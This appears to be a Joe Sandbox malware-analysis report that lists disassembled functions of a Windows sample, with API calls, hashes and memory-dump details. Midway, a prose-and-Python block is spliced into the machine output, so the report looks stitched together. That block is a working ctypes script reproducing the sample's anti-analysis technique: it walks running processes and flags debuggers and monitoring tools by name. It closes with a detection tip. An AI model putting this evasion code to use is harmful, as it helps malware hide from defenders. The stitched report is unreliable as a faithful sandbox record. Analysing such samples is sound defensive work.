                          • Instruction Fuzzy Hash: A4416171A1020CEBDB54EFA4EC86BDE7774AF94304F408065B90997251EE38AE578B91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E7F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E7F60
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E7FA5
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E7FD3
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E8007
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: dd2693d2d42a943b6ec5fa763beb65b2128f6d8f14a328cccd34978968ecc057
                          • Instruction ID: 70ac9489dee2f4062a58e5d81ae34b28feb59498acabfa5a9d8f08b4310faf6c
                          • Opcode Fuzzy Hash: dd2693d2d42a943b6ec5fa763beb65b2128f6d8f14a328cccd34978968ecc057
                          • Instruction Fuzzy Hash: 7F41C17060511ADFDB20DFA9D884EAEB7B4FF58300B114099E805EB351DB78EA67CB91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E80BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E80EA
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E8102
                          • lstrlen.KERNEL32(00000000), ref: 007E8140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 5011d5572da0631070cac3dfcf315f61308e10cd258714c3d2576ad321052812
                          • Instruction ID: eb100874b9611e6397eca23b083435e8d07ec4b69efa2e33f2f1a73cb64f539d
                          • Opcode Fuzzy Hash: 5011d5572da0631070cac3dfcf315f61308e10cd258714c3d2576ad321052812
                          • Instruction Fuzzy Hash: F441AE7160010ADBDB61DFB9D988BAABBF4EF48300F10851DA849D7245EF38ED46CB91
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 007F1B72
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F184F
                            • Part of subcall function 007F1820: lstrlen.KERNEL32(01247318), ref: 007F1860
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F1887
                            • Part of subcall function 007F1820: lstrcat.KERNEL32(00000000,00000000), ref: 007F1892
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F18C1
                            • Part of subcall function 007F1820: lstrlen.KERNEL32(00804FA0), ref: 007F18D3
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F18F4
                            • Part of subcall function 007F1820: lstrcat.KERNEL32(00000000,00804FA0), ref: 007F1900
                            • Part of subcall function 007F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 007F192F
                          • sscanf.NTDLL ref: 007F1B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 007F1BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 007F1BC6
                          • ExitProcess.KERNEL32 ref: 007F1BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: 175cd38f64828a1c175fd798ed1282bc6ad6148796bbf5c314e3b78f083c8220
                          • Instruction ID: bfd0aed8324d62e62069c98cb15e23812bb1047ed9b25613f5f4bbf8dae8d71a
                          • Opcode Fuzzy Hash: 175cd38f64828a1c175fd798ed1282bc6ad6148796bbf5c314e3b78f083c8220
                          • Instruction Fuzzy Hash: EB21E4B1518305EF8350DFA5D88496BBBF8EED8314F409A1EF599C3220E734D5068BA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F3166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F316D
                          • RegOpenKeyExA.ADVAPI32(80000002,0124C208,00000000,00020119,?), ref: 007F318C
                          • RegQueryValueExA.ADVAPI32(?,0125DB50,00000000,00000000,00000000,000000FF), ref: 007F31A7
                          • RegCloseKey.ADVAPI32(?), ref: 007F31B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: f5d7d0548a557df6dc394b307fac69d156a2d797c1679a98903a5241ad62f794
                          • Instruction ID: 97d8b67edad0e2f2be0107fb34c9a061b3b6dd255d1307b0019ca88c5861b5c4
                          • Opcode Fuzzy Hash: f5d7d0548a557df6dc394b307fac69d156a2d797c1679a98903a5241ad62f794
                          • Instruction Fuzzy Hash: 991130B6A40209AFD710DFD4DD45FBBBBBCE748711F004119FA05D3680DB75590687A1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: a887b70971050cce9f4654d6b9123b4be448c0c0caa80e5aafb52c08134e5add
                          • Instruction ID: 8fb9b73899149caa57ca3b7ea59b78e97dff80ca2a686387fa38e981b810026d
                          • Opcode Fuzzy Hash: a887b70971050cce9f4654d6b9123b4be448c0c0caa80e5aafb52c08134e5add
                          • Instruction Fuzzy Hash: 4D41E77150475CAEDB318B248C89FFB7BFCAF45704F1444E8EB9686282E2759A45CF60
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D8996
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1D5
                            • Part of subcall function 007FA1C0: std::exception::exception.LIBCMT ref: 007FA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D89CD
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: 8c52bd1df2e14a050264664bdd460362551216572ef5c49f6bb01f06536f5e6b
                          • Instruction ID: ee0f79ef103929daba088624d8206313e38add8a193d401e3f9916084a535026
                          • Opcode Fuzzy Hash: 8c52bd1df2e14a050264664bdd460362551216572ef5c49f6bb01f06536f5e6b
                          • Instruction Fuzzy Hash: D221D6B23002509BC7609A5CE850A6AF7B9DBA1761B15093FF195CB381DB75EC41C3A7
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D8883
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 49b5f599c47f98e8c7d4159936a63c8f57bac45bd77211475b230d08b4f13c5f
                          • Instruction ID: bb935c6bb06e2c85066d608ae4d11916271ac96793814758bccdd5cbf0a2f27d
                          • Opcode Fuzzy Hash: 49b5f599c47f98e8c7d4159936a63c8f57bac45bd77211475b230d08b4f13c5f
                          • Instruction Fuzzy Hash: 7631C9B5E005199FCB08DF58C8906AEBBB6EB88310F148269E915DF384DB34AD01CBD1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5922
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 007F5935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 300b0e4ab7cfdfb3767690ec4d685c95c35faebc97cb2711c956ca508baf4d0f
                          • Instruction ID: 38aee257467935112a04d9f016b01bcfc000405b821cb5476be0544faa63323a
                          • Opcode Fuzzy Hash: 300b0e4ab7cfdfb3767690ec4d685c95c35faebc97cb2711c956ca508baf4d0f
                          • Instruction Fuzzy Hash: 0E117030314B44CBC725CB2CE80072977E5AB91760F250A5EE3E187796D7A9E841C7A1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,007FA430,000000FF), ref: 007F3D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F3D27
                          • wsprintfA.USER32 ref: 007F3D37
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 67fcda3089a7805a53df76d2d98172c8da33dcff96d5b3535ae4fd7626c86109
                          • Instruction ID: 1029943078947d80a00b109fdd82289f222d31716aab428af08b87f5c60d0017
                          • Opcode Fuzzy Hash: 67fcda3089a7805a53df76d2d98172c8da33dcff96d5b3535ae4fd7626c86109
                          • Instruction Fuzzy Hash: 9D01C071A40708BBE7109F94DC0AF6BBB78FB45B61F000115FA05973D0C7B81902CAA6
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007D8737
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA188
                            • Part of subcall function 007FA173: std::exception::exception.LIBCMT ref: 007FA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 7ae123731202f063fa5cac114e15f5716949b4941484f524387fa604d6ac8a27
                          • Instruction ID: ed3b59fc4b906f627391b732f4dbaa02cb930c733996f683f9bb18354defde9d
                          • Opcode Fuzzy Hash: 7ae123731202f063fa5cac114e15f5716949b4941484f524387fa604d6ac8a27
                          • Instruction Fuzzy Hash: D2F02433F000311F8394647D8C8509FA82796E43A033AD722E95AEF399EC34EC8281D2
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EE544
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE573
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE581
                          • lstrcat.KERNEL32(?,0125DE10), ref: 007EE59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 124e18745f1c77aa9fae578b8da6c11fb58b71d7fcdb371362f01740ac77569e
                          • Instruction ID: 643f1e72326fd4246ba512ef5c280a79bca9aae5cc2756b395f0204cd30ff01c
                          • Opcode Fuzzy Hash: 124e18745f1c77aa9fae578b8da6c11fb58b71d7fcdb371362f01740ac77569e
                          • Instruction Fuzzy Hash: E55195B1A1011CEBD755EB94DC46EEE33BDEB88300F444469BA0697342DA78AE478B91
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 007F1FDF, 007F1FF5, 007F20B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 76fe46cc7e80bc8aaf78569eca1f7e3faafe8e47fb4080d5841cea13888cf6f5
                          • Instruction ID: 651a6d62b2e207b55f83d7dd2a65d5bf5cc53d77d547c60ef2f26a94cb698059
                          • Opcode Fuzzy Hash: 76fe46cc7e80bc8aaf78569eca1f7e3faafe8e47fb4080d5841cea13888cf6f5
                          • Instruction Fuzzy Hash: 0A21283651028E8AD720EA75C8447FDF766EF803A1F844056CA194B383EB3A190BD796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EEBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 007EEBF1
                          • lstrcat.KERNEL32(?,0125E538), ref: 007EEC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: b6dd6e199f0d74ed7f2054ba3449244750c5688c44bcd42741a41d4f96b557c4
                          • Instruction ID: 31e811f844317fcaee25afa1196c6ce674355c25d6267e2506feb22625594ba9
                          • Opcode Fuzzy Hash: b6dd6e199f0d74ed7f2054ba3449244750c5688c44bcd42741a41d4f96b557c4
                          • Instruction Fuzzy Hash: 60318671A1011CDBCB21EFA4DC45BEE73B8EF98300F1054A9BA46A7351DE389E478B94
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 007F4492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 007F44AD
                          • CloseHandle.KERNEL32(00000000), ref: 007F44B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F44E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 8df619d559e22ff8ef6a586a2842ba75cbff4eb74fd1363aa70d635dbe072968
                          • Instruction ID: b7b069bfe92bee428e63d81bb7d6182c233b5935ebd2fade99d97c30df5ba469
                          • Opcode Fuzzy Hash: 8df619d559e22ff8ef6a586a2842ba75cbff4eb74fd1363aa70d635dbe072968
                          • Instruction Fuzzy Hash: F9F0C8B09016596BE7209BB49C49BF776A8AB14704F004591EB85E7281DAB89C828794
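The four calls in the function above (OpenProcess with desired access 0x410, which is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, GetModuleFileNameExA into a 0x104-byte buffer, CloseHandle, then lstrcpy of the returned path) are the per-process image lookup behind the report's "Searches for specific processes" and "Tries to detect process monitoring tools" signatures. The Python below is an added example, not the sample's code or Joe Sandbox output: it reproduces the same call sequence with ctypes and the basename comparison that such a check performs. The tool-name list, the use of EnumProcesses to obtain PIDs, and the process table used off-Windows are assumptions for illustration; the report shows neither how the sample builds its PID list nor which names it compares against.

```python
"""Added example: reproduces the OpenProcess(0x410) / GetModuleFileNameExA / CloseHandle
chain from the dump and the image-name comparison that follows it.  Not the sample's code."""
import sys

PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010
OPEN_FLAGS = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ  # 0x410, the value seen at 007F4492
MAX_PATH = 0x104  # nSize handed to GetModuleFileNameExA at 007F44AD

# Hypothetical blocklist: the names the sample actually compares are not visible in the report.
ANALYSIS_TOOL_NAMES = frozenset({
    "taskmgr.exe", "procexp.exe", "procexp64.exe", "procmon.exe", "procmon64.exe",
    "x32dbg.exe", "x64dbg.exe", "ollydbg.exe", "windbg.exe", "ida.exe", "ida64.exe",
    "wireshark.exe", "fiddler.exe", "tcpview.exe",
})


def image_basename(path):
    """Final path component, case-folded, so the comparison ignores the install directory."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_analysis_tools(processes, blocklist=ANALYSIS_TOOL_NAMES):
    """processes: iterable of (pid, image_path).  An empty path means the
    OpenProcess/GetModuleFileNameExA step failed (System, protected processes, other sessions).
    Returns the matching (pid, basename) pairs in enumeration order."""
    hits = []
    for pid, path in processes:
        if not path:
            continue
        name = image_basename(path)
        if name in blocklist:
            hits.append((pid, name))
    return hits


def enumerate_processes_win32():
    """Windows only.  For each PID: OpenProcess(0x410, FALSE, pid) ->
    GetModuleFileNameExA(h, NULL, buf, 0x104) -> CloseHandle(h), exactly the dump's sequence.
    PIDs come from EnumProcesses, which is an assumption (not shown in the report)."""
    import ctypes
    from ctypes import wintypes

    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    psapi = ctypes.WinDLL("psapi", use_last_error=True)
    kernel32.OpenProcess.restype = wintypes.HANDLE
    kernel32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    kernel32.CloseHandle.argtypes = [wintypes.HANDLE]
    psapi.EnumProcesses.argtypes = [ctypes.POINTER(wintypes.DWORD), wintypes.DWORD,
                                    ctypes.POINTER(wintypes.DWORD)]
    psapi.GetModuleFileNameExA.restype = wintypes.DWORD
    psapi.GetModuleFileNameExA.argtypes = [wintypes.HANDLE, wintypes.HMODULE,
                                           ctypes.c_char_p, wintypes.DWORD]

    pids = (wintypes.DWORD * 4096)()
    returned = wintypes.DWORD(0)
    if not psapi.EnumProcesses(pids, ctypes.sizeof(pids), ctypes.byref(returned)):
        raise ctypes.WinError(ctypes.get_last_error())

    result = []
    for pid in pids[: returned.value // ctypes.sizeof(wintypes.DWORD)]:
        handle = kernel32.OpenProcess(OPEN_FLAGS, False, pid)
        if not handle:
            result.append((pid, ""))  # access denied: the check simply skips such processes
            continue
        buf = ctypes.create_string_buffer(MAX_PATH)
        length = psapi.GetModuleFileNameExA(handle, None, buf, MAX_PATH)
        kernel32.CloseHandle(handle)
        result.append((pid, buf.value.decode("mbcs", "replace") if length else ""))
    return result


# Constructed process table (not from the report) so the matcher runs on any platform.
SAMPLE_PROCESSES = [
    (4, ""),                                              # System: OpenProcess fails
    (1234, r"C:\Windows\explorer.exe"),
    (2048, r"C:\Windows\System32\Taskmgr.exe"),           # matches regardless of case
    (3100, r"C:\Tools\SysinternalsSuite\procexp64.exe"),
    (5000, r"C:\Users\user\Desktop\file.exe"),
]


def main():
    procs = enumerate_processes_win32() if sys.platform == "win32" else SAMPLE_PROCESSES
    hits = find_analysis_tools(procs)
    for pid, name in hits:
        print(f"analysis tool running: pid={pid} image={name}")
    return hits


if __name__ == "__main__":
    main()
```

On Windows the script walks live processes; elsewhere it runs the matcher over the constructed table. For detection the pattern is worth turning around: a freshly started, unsigned process that opens a handle to nearly every PID with GrantedAccess 0x410 in a tight burst is visible in Sysmon Event ID 10 (ProcessAccess) and is unusual for anything that is not itself a monitoring tool.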
                          APIs
                          • __getptd.LIBCMT ref: 007F8FDD
                            • Part of subcall function 007F87FF: __amsg_exit.LIBCMT ref: 007F880F
                          • __getptd.LIBCMT ref: 007F8FF4
                          • __amsg_exit.LIBCMT ref: 007F9002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 007F9026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
